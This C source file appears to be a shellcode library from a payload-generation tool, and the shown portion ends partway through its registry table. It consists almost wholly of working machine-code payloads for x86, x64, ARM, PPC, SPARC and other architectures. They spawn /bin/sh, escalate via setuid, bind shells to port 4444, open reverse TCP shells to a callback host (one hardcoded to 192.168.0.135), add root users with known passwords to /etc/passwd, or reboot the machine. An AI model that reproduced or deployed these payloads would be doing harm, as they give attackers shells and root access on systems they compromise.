"\xd4\x01\x13\x28\x88\x08\xab\x26\x6b\x9e\x59\x8e\x80\xae\xa8\xda"
"\xb7\x36\xba\x20\x62\x50\x75\x21\x0f\x3d\x4f\xba\xc6\x3b\x5a\xbb"
"\xc8\x71\x41\xfe\x86\x3b\x56\xfe\x9d\x2d\x47\xac\xc8\x27\x02\xa6"
"\xc8\x71\x63\x9a\xac\x7e\x04\xf8\xc8\x30\x47\xaa\xc8\x32\x4d\xbd"
"\x89\x32\x45\xac\x87\x2b\x52\xfe\xa9\x3a\x4f\xb7\x86\x37\x51\xaa"
"\x9a\x3f\x56\xb1\x9a\x2d\x02\xa7\xc8\x71\x63\x9a\xac\x5e\x22\xde";
/*
"\x33\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08"
"\x99\xc6\xb8\x83\xeb\xfc\xe2\xf4\xf4\x71\x82\xb8\x08\x99\x4d\xfd"
"\x34\x12\xba\xbd\x70\x98\x29\x33\x47\x81\x4d\xe7\x28\x98\x2d\xf1"
"\x83\xad\x4d\xb9\xe6\xa8\x06\x21\xa4\x1d\x06\xcc\x0f\x58\x0c\xb5"
"\x09\x5b\x2d\x4c\x33\xcd\xe2\xbc\x7d\x7c\x4d\xe7\x2c\x98\x2d\xde"
"\x83\x95\x8d\x33\x57\x85\xc7\x53\x83\x85\x4d\xb9\xe3\x10\x9a\x9c"
"\x0c\x5a\xf7\x78\x6c\x12\x86\x88\x8d\x59\xbe\xb4\x83\xd9\xca\x33"
"\x78\x85\x6b\x33\x60\x91\x2d\xb1\x83\x19\x76\xb8\x08\x99\x4d\xd0"
"\x34\xc6\xf7\x4e\x68\xcf\x4f\x40\x8b\x59\xbd\xe8\x60\x69\x4c\xbc"
"\x57\xf1\x5e\x46\x82\x97\x91\x47\xef\xfa\xab\xdc\x26\xfc\xbe\xdd"
"\x28\xb6\xa5\x98\x66\xfc\xb2\x98\x7d\xea\xa3\xca\x28\xe1\xe6\xc1"
"\x28\xb6\x87\xfc\x4c\xb9\xe0\x9e\x28\xf7\xa3\xcc\x28\xf5\xa9\xdb"
"\x69\xf5\xa1\xca\x67\xec\xb6\x98\x49\xfd\xab\xd1\x66\xf0\xb5\xcc"
"\x7a\xf8\xb2\xd7\x7a\xea\xe6\xc0\x28\xb6\x87\xfc\x4c\x99\xc6\xb8";
*/
unsigned char x86_w32_cmd_exit[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8"
"\x2a\x6e\x63\x83\xeb\xfc\xe2\xf4\x54\xc2\x2a\x63\xa8\x2a\xe5\x26"
"\x94\xa1\x12\x66\xd0\x2b\x81\xe8\xe7\x32\xe5\x3c\x88\x2b\x85\x2a"
"\x23\x1e\xe5\x62\x46\x1b\xae\xfa\x04\xae\xae\x17\xaf\xeb\xa4\x6e"
"\xa9\xe8\x85\x97\x93\x7e\x4a\x67\xdd\xcf\xe5\x3c\x8c\x2b\x85\x05"
"\x23\x26\x25\xe8\xf7\x36\x6f\x88\x23\x36\xe5\x62\x43\xa3\x32\x47"
"\xac\xe9\x5f\xa3\xcc\xa1\x2e\x53\x2d\xea\x16\x6f\x23\x6a\x62\xe8"
"\xd8\x36\xc3\xe8\xc0\x22\x85\x6a\x23\xaa\xde\x63\xa8\x2a\xe5\x0b"
"\x94\x75\x5f\x95\xc8\x7c\xe7\x9b\x2b\xea\x15\x33\xc0\xc5\xa0\x83"
"\xc8\x42\xf6\x9d\x22\x24\x39\x9c\x4f\x49\x03\x07\x86\x4f\x16\x06"
"\xa8\x2a\x6e\x63";
unsigned char sparc_linux_bind4444[] =
"\x23\x2d\x57\xbb\xa2\x14\x63\xd5\x20\xbf\xff\xff\x20\xbf\xff\xff"
"\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\xea\x23\xe0\x20"
"\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x9e\x03\xe0\x04"
"\x29\x75\x4f\xd2\xf1\x9a\xaf\xde\x61\x8a\x8f\xdf\x61\x89\x70\x2b"
"\xb1\xed\x30\x2b\xf1\xd1\xf0\x37\x60\x35\xaf\xcb\x06\x29\x8f\x1d"
"\x97\x99\xf0\xb1\x3c\x3a\x50\x91\x9a\x2d\xb0\xc1\x32\x6e\x0f\x15"
"\x54\x4a\xcf\x2d\xb1\xad\x30\x49\x69\xb8\x10\x0d\xc3\xdf\x12\xb8"
"\xfb\xe4\x2d\x22\x6c\x0b\x72\xa0\x1d\xfb\x52\xb4\xbf\xeb\xb2\xb5"
"\x22\x28\x0d\x4d\x32\x3f\x52\xa9\xa3\xef\xb2\xa1\x04\x2c\x0d\x39"
"\x44\x10\xcd\x45\xd4\x47\x12\xb0\x45\xb7\x72\xaa\xb6\x14\xcd\x3e"
"\xa4\x4b\x12\xbd\x5a\xc9\x32\xc0\xd9\x1d\x92\x98\x4c\xcd\xf3\x0c"
"\x7c\x52\x0c\xd1\x51\xae\x4c\xdd\xc5\xab\x73\x16\xc4\xc7\xab\xb2"
"\xa6\xcc\x6a\xac\x85\xe7\xb1\xea\x59\xdb\xea\x1a\xc8\x38\x4a\x12"
"\x0c\x04\x35\xd2\x1c\x58\xf5\xea\x5c\xbc\xb5\xf6\xde\xd2\xea\x3d"
"\x4f\x02\xca\x49\x70\xa3\x0a\x49";
unsigned char x86_bsd_suidsh[] =
"\x31\xc0\x50\x50\xb0\x17\xcd\x80" // setuid
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
unsigned char x86_netbsd_binsh[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
unsigned char x86_osx_binsh[] =
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";
unsigned char x86_osx_binsh2[] =
"\x99\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x54"
"\x54\x53\x53\x8d\x42\x3b\xcd\x80";
unsigned char x86_osx_bind4444[] =
"\x33\xc9\x83\xe9\xea\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
"\x7e\x85\xb4\x83\xeb\xfc\xe2\xf4\xaf\x3c\xdd\x79\x45\x14\xe4\xec"
"\x5c\x2c\xed\xa4\xc7\x6f\xd9\x3d\x24\x2c\xc7\xe6\x87\x2c\xef\xa4"
"\x08\xfe\x1c\x27\x94\x2d\xd7\xde\xad\x26\x48\x34\x75\x14\x48\x34"
"\x97\x2d\xd7\x04\xdb\xb3\x05\x23\xaf\x7c\xdc\xde\x9f\x26\xd4\xe3"
"\x94\xb3\x05\xfd\xca\xf7\x74\x4b\x3a\x81\xd5\xdc\xea\x51\xf6\xdc"
"\xad\x51\xe7\xdd\xab\xf7\x66\xe4\x91\x2a\xd6\xe7\x75\x45\x48\x34";
char x86_linux_binsh3[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
unsigned char x86_solaris_bind4444[] =
"\x31\xc9\x83\xe9\xe8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x08\x0b\x8d\x83\xeb\xfc\xe2\xf4\x87\xf7\xf3\x72\x03\xff\xdb\xdd"
"\x0e\xc8\xbb\x17\x6f\x81\xee\xbc\xf6\x59\x4a\xcc\x6e\x59\xbb\x6b"
"\xc0\xdd\x3a\x5f\xb6\xcf\x59\xeb\x57\x19\x57\xeb\x6e\x81\xed\xe7"
"\x2f\x5e\x5c\x3d\xd7\xf7\xde\x3d\xd6\xf7\xde\xdd\x6f\x5f\xbb\x67"
"\xc0\xdd\x3a\x5f\x8d\x01\x5a\xdf\x6f\xb8\x35\x72\xea\x41\x72\x7f"
"\x6f\x60\x24\xa2\x4c\x60\x63\xa2\x5d\x61\x65\x04\xdc\x58\x58\x04"
"\xdd\x58\x59\xde\x8f\x33\xf4\x58";
char *arm_linux_thumb="\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0c\x30\xc0\x46\x01\x90"
"\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68";
char arm_linux_binsh[]= "\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5"
"\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
"\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char arm_linux_suidsh[]=
"\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef"
"\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5" // shellcode
"\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
"\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char x86_openbsd_binsh[] =
"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x54"
"\x53\x53\x6a\x3b\x58\xcd\x80";
long x86_openbsd_bind6969[]= {
0x4151c931,0x51514151,0x61b0c031,0x078980cd,0x4f88c931,0x0547c604,0x084f8902,
0x0647c766,0x106a391b,0x5004478d,0x5050078b,0x68b0c031,0x016a80cd,0x5050078b,
0x6ab0c031,0xc93180cd,0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,0x50078b51,
0xb0c03150,0x4180cd5a,0x7503f983,0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,0x01b0c031,0xd8e880cd,0x2fffffff,
0x2f6e6962,0x90416873 };
unsigned char arm_linux_setuid[]=
"\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef";
unsigned long armle_osx_reverse[]= {
0xe3a00002, 0xe3a01001, 0xe3a02006, 0xe3a0c061, 0xef000080, 0xe1a0a000, 0xeb000001,
0x5c110200, //# port 4444
0x8700a8c0, //# host 192.168.0.135
0xe1a0000a, 0xe1a0100e, 0xe3a02010, 0xe3a0c062, 0xef000080,
0xe3a05002, 0xe3a0c05a, 0xe1a0000a, 0xe1a01005, 0xef000080,
0xe2455001, 0xe3550000, 0xaafffff8, 0xe3a00000, 0xe3a01001,
0xe3a0c07e, 0xef000080, 0xe0455005, 0xe1a0600d, 0xe24dd020,
0xe28f0014, 0xe4860000, 0xe5865004, 0xe1a01006, 0xe3a02000,
0xe3a0c03b, 0xef000080,
//# /bin/sh
0x6e69622f, 0x0068732f };
unsigned char x64_linux_binsh[] =
"\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53"
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b"
"\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05";
unsigned char x86_freebsd_reboot[] = "\x31\xc0\x50\xb0\x37\xcd\x80";
unsigned char x86_freebsd_reverse[] =
"\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61"
"\xcd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e"
"\x53\x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53"
"\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d"
"\x7e\x0f\x31\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10"
"\x51\x53\x50\xb0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43"
"\x43\x7f\x00\x00\x01\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned char x86_bsdlinux_binsh[] = // by dymitrii
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50"
"\x8c\xe0\x21\xc0\x74\x04\xb0\x3b\xeb\x07\xb0\x0b\x99\x52\x53\x89\xe1\xcd\x80";
char x86_solaris_binsh[] =
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20"
"\x43"
"\xe0\xfa"
"\x93"
"\x29\xc0"
"\x89\x5e\x0b"
"\x29\xd2"
"\x88\x56\x19"
"\x89\x56\x07"
"\x89\x56\x0f"
"\x89\x56\x14"
"\xb0\x3b"
"\x8d\x4e\x0b"
"\x89\xca"
"\x52"
"\x51"
"\x53"
"\x50"
"\xeb\x18"
"\xe8\xc8\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48"
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04";
unsigned char x86_solaris_binshu[] =
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20\x43\xe0\xfa"
"\x93\x29\xc0\x89\x5e\x0b\x29\xd2\x88\x56\x19\x89\x56\x07\x89\x56\x0f\x89\x56\x14"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc8\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48" /* /bin/sh -= 0x20 */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
unsigned char ppc_osx_binsh0[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x71\x39\x40\x01\x71"
"\x39\x1f\xfe\xce\x7c\xa8\x29\xae\x38\x7f\xfe\xc7\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xca\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0a\xfe\x90"
"\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x54";
unsigned char ppc_osx_reboot[] =
"\x7c\x63\x1a\x79\x39\x40\x01\x70\x38\x0a\xfe\xb4\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x0a\xfe\xc7\x44\xff\xff\x02";
unsigned char ppc_osx_adduser[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70"
"\x39\x60\x01\x70\x39\x1f\xff\x0d\x7c\xa8\x29\xae\x38\x7f\xff\x04"
"\x38\x80\x02\x01\x38\xa0\xff\xff\x38\x0b\xfe\x95\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x9f\xff\x0e\x38\xab\xfe\xe5\x38\x0b\xfe\x94"
"\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0b\xfe\x96\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x38\x7f\xff\x04\x90\x61\xff\xf8"
"\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x0b\xfe\xcb\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x0b\xfe\x91\x44\xff\xff\x02\x2f\x74\x6d\x70"
"\x2f\x78\x2e\x73\x68\x58\x23\x21\x2f\x62\x69\x6e\x2f\x73\x68\x0a"
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x27\x72\x30\x30\x74\x3a"
"\x3a\x39\x39\x39\x3a\x38\x30\x3a\x3a\x30\x3a\x30\x3a\x72\x30\x30"
"\x74\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x27\x20\x7c\x20\x2f"
"\x75\x73\x72\x2f\x62\x69\x6e\x2f\x6e\x69\x6c\x6f\x61\x64\x20\x2d"
"\x6d\x20\x70\x61\x73\x73\x77\x64\x20\x2e\x0a";
long ppc_bsd_binsh[] = { /* Palante's BSD PPC shellcode w/ NULL*/
0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6,
0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,
0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,
0x7CC419AE, 0x7C8429D6, 0x7C842214, 0x7C043A14,
0x7CE72850, 0x7C852A14, 0x7C63212E, 0x7C832214,
0x7CC5212E, 0x7CA52A78, 0x44FFFF02, 0x7CE03B78,
0x44FFFF02, 0x4BFFFFA9, 0x2F62696E, 0x2F73685A,
0xFFFFFFFF, 0xFFFFFFFF
};
/*
* 203 byte StrongARM/Linux bind() portshell shellcode
* funkysh
*/
char arm_linux_bind[] =
"\x20\x60\x8f\xe2" /* add r6, pc, #32 */
"\x07\x70\x47\xe0" /* sub r7, r7, r7 */
"\x01\x70\xc6\xe5" /* strb r7, [r6, #1] */
"\x01\x30\x87\xe2" /* add r3, r7, #1 */
"\x13\x07\xa0\xe1" /* mov r0, r3, lsl r7 */
"\x01\x20\x83\xe2" /* add r2, r3, #1 */
"\x07\x40\xa0\xe1" /* mov r4, r7 */
"\x0e\xe0\x4e\xe0" /* sub lr, lr, lr */
"\x1c\x40\x2d\xe9" /* stmfd sp!, {r2-r4, lr} */
"\x0d\x10\xa0\xe1" /* mov r1, sp */
"\x66\xff\x90\xef" /* swi 0x90ff66 (socket) */
"\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
"\x35\x70\xc6\xe5" /* strb r7, [r6, #53] */
"\x14\x20\xa0\xe3" /* mov r2, #20 */
"\x82\x28\xa9\xe1" /* mov r2, r2, lsl #17 */
"\x02\x20\x82\xe2" /* add r2, r2, #2 */
"\x14\x40\x2d\xe9" /* stmfd sp!, {r2,r4, lr} */
"\x10\x30\xa0\xe3" /* mov r3, #16 */
"\x0d\x20\xa0\xe1" /* mov r2, sp */
"\x0d\x40\x2d\xe9" /* stmfd sp!, {r0, r2, r3, lr} */
"\x02\x20\xa0\xe3" /* mov r2, #2 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x0d\x10\xa0\xe1" /* mov r1, sp */
"\x66\xff\x90\xef" /* swi 0x90ff66 (bind) */
"\x45\x70\xc6\xe5" /* strb r7, [r6, #69] */
"\x02\x20\x82\xe2" /* add r2, r2, #2 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x66\xff\x90\xef" /* swi 0x90ff66 (listen) */
"\x5d\x70\xc6\xe5" /* strb r7, [r6, #93] */
"\x01\x20\x82\xe2" /* add r2, r2, #1 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x04\x70\x8d\xe5" /* str r7, [sp, #4] */
"\x08\x70\x8d\xe5" /* str r7, [sp, #8] */
"\x66\xff\x90\xef" /* swi 0x90ff66 (accept) */
"\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
"\x02\x10\xa0\xe3" /* mov r1, #2 */
"\x71\x70\xc6\xe5" /* strb r7, [r6, #113] */
"\x15\x07\xa0\xe1" /* mov r0, r5, lsl r7 <dup2> */
"\x3f\xff\x90\xef" /* swi 0x90ff3f (dup2) */
"\x01\x10\x51\xe2" /* subs r1, r1, #1 */
"\xfb\xff\xff\x5a" /* bpl <dup2> */
"\x99\x70\xc6\xe5" /* strb r7, [r6, #153] */
"\x14\x30\x8f\xe2" /* add r3, pc, #20 */
"\x04\x30\x8d\xe5" /* str r3, [sp, #4] */
"\x04\x10\x8d\xe2" /* add r1, sp, #4 */
"\x02\x20\x42\xe0" /* sub r2, r2, r2 */
"\x13\x02\xa0\xe1" /* mov r0, r3, lsl r2 */
"\x08\x20\x8d\xe5" /* str r2, [sp, #8] */
"\x0b\xff\x90\xef" /* swi 0x900ff0b (execve) */
"/bin/sh";
char x86_ppc_linux_binsh[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
// linux/ppc execve /bin/sh by Charles Stevenson (core) <core@bokeoa.com>
"\x7c\x3f\x0b\x78" /*mr r31,r1 # optional instruction */
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ" // the last byte becomes NULL
// lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
// Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
// Copyright(c) 2005 BaCkSpAcE <sinisa86@gmail.com>
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34";
char x86_ppc_osx_binsh[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"
// ppc execve() code by b-r00t
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58"
// osx86 execve() code by nemo
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";
/* by Jonathan Salwan
* http://shell-storm.org/shellcode/files/shellcode-735.php
*/
char arm_linux_adduser[] =
/* Thumb mode */
"\x05\x50\x45\xe0" /* sub r5, r5, r5 */
"\x01\x50\x8f\xe2" /* add r5, pc, #1 */
"\x15\xff\x2f\xe1" /* bx r5 */
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x78\x46" /* mov r0, pc */
"\x7C\x30" /* adds r0, #124 */
"\xff\x21" /* movs r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\x45\x31" /* adds r1, #69 */
"\xdc\x22" /* movs r2, #220 */
"\xc8\x32" /* adds r2, #200 */
"\x05\x27" /* movs r7, #5 */
"\x01\xdf" /* svc 1 */
/* r8 = fd */
"\x80\x46" /* mov r8, r0 */
/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x79\x46" /* mov r1, pc */
"\x18\x31" /* adds r1, #24 */
"\xc0\x46" /* nop (mov r8, r8) */
"\x48\x22" /* movs r2, #72 */
"\x04\x27" /* movs r7, #4 */
"\x01\xdf" /* svc 1 */
/* close(fd) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x06\x27" /* movs r7, #6 */
"\x01\xdf" /* svc 1 */
/* exit(0) */
"\x1a\x49" /* subs r1, r1, r1 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x01\x27" /* movs r7, #1 */
"\x01\xdf" /* svc 1 */
/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
"\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
"\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
"\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
"\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
"\x68\x0a"
/* /etc/passwd */
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
/* by Dustin Schultz
* http://shell-storm.org/shellcode/files/shellcode-736.php
*/
char x64_osx_suidsh[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";
/* OSX reverse tcp shell (131 bytes)
* replace FFFFFFFF around byte 43 with the call back ip in hex
* replace 5C11 around byte 39 with a new port current is 4444
* http://hammackj.com/2011/04/28/osx-x64-reverse-tcp-shellcode/
*/
char x64_osx_reverse_tcp[] =
"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48"
"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F"
"\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41"
"\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89"
"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83"
"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83"
"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48"
"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED"
"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05";
#define ENTRY(a,b,c,x,y,z) { .name=x, .desc=z, .data=(unsigned char *)&y, .len=sizeof(y)-1, \
.cmd=a, .host=b, .port=c },
#define ENTRY_NULL() { NULL, NULL, NULL, 0 }
struct shellcode_t shellcodes[] = {
ENTRY(0,0,0,"arm.linux.adduser", arm_linux_adduser, "Adds root user 'shell-storm' with password 'toor'" )
ENTRY(0,0,0,"arm.linux.binsh", arm_linux_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"arm.linux.thumb", arm_linux_thumb, "Runs /bin/sh using thumb mode trick" )
ENTRY(0,0,0,"arm.linux.suidsh", arm_linux_suidsh, "Setuid and runs /bin/sh" )
ENTRY(0,0,0,"arm.linux.bind", arm_linux_bind, "Binds /bin/sh to a tcp port" )
ENTRY(0,0,30,"armle.osx.reverse", armle_osx_reverse, "iPhone reverse connect shell to HOST and PORT" )
ENTRY(0,0,0,"dual.linux.binsh", x86_ppc_linux_binsh, "x86/ppc MacOSX /bin/sh shellcode" )
ENTRY(0,0,0,"dual.osx.binsh", x86_ppc_osx_binsh, "Runs /bin/sh (works also on x86) (dual)" )
ENTRY(0,0,0,"mips.linux.binsh", mips_linux_binsh, "Runs /bin/sh (tested on loongson2f)." )
ENTRY(0,0,0,"ppc.osx.adduser", ppc_osx_adduser, "Adds a root user named 'r00t' with no pass." )
ENTRY(0,0,0,"ppc.osx.binsh", ppc_osx_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"ppc.osx.binsh0", ppc_osx_binsh0, "Executes /bin/sh (with zeroes)" )
